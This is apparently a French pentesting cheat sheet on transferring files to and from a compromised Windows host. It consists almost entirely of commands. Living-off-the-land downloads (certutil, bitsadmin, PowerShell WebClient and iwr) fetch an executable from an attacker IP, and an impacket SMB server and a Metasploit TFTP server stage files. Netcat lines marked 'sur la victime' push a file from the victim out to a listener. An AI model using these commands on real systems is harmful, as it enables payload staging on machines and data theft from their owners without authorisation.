Transfert de fichiers

Avec Windows

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe ”

certutil -urlcache -f http://192.168.1.2/putty.exe putty.exe

bitsadmin /transfer job https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe C:\Temp\putty.exe

curl http://192.168.1.2/putty.exe -o putty.exe

wget http://192.168.1.2/putty.exe -OutFile putty.exe

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://192.168.1.2/putty.exe’, ‘putty.exe’)

impacket-smbserver share $(pwd) -smb2support

tftp

use auxiliary/server/tftp
set srvhost 10.9.0.24
set tftproot /home/r0cker
exploit
tftp -i 192.168.1.2 GET file.txt #sur l<ordinateur de la victime

netcat
nc -lvp 5555 > file.txt
nc 10.9.0.24 5555 < file.txt #sur la victime

Leave a Reply